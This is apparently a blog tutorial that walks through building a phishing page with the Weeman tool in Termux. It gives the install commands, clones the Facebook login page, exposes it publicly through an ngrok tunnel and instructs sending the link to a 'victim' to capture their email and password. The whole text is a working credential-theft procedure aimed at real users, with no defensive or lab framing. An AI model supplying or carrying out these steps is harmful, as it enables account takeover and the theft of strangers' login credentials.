Create phishing page using Weeman tool in Termux

Create phishing page


In this article I will show you, how can you make social media phishing pages by Weeman tool. This tool works on both Linux and Android (both rooted and non-rooted) 





Open Termux

Open the terminal and apply the following commands.


$ apt-get update -y


$ apt-get upgrade -y


$ pkg install python -y


$ pkg install python2 -y


$ pkg install git -y


$ git clone https://github.com/evait-security/weeman.git


$ cd weeman


$ python2 weeman.py



( Screenshots will be appear soon. )



Now open the browser and open a login page on which login page you want to clone. For example, I will clone the Facebook login page.


Now copy the login page url.

     example:- https://www.facebook.com/login



Now back to terminal


$ set url https://www.facebook.com/login


$ set action_url https://www.facebook.com/login


$ set port 8080


Now you need start Ngrok tunnel. It will expose the local tunnel to the internet via a secure connection.

Open NEW SESSION


$ ./ngrok http 8080


Now copy the URL who has .ngrok.io at the end.



Now send this link to the victim which login credentials you want to takeover.


After successfully login that page.



Back to the terminal.


Now you will see the login details email and password.

( Screenshot well be appear soon. )



( Video tutorial will be appear soon. )


Thanks for visit our site.


Comments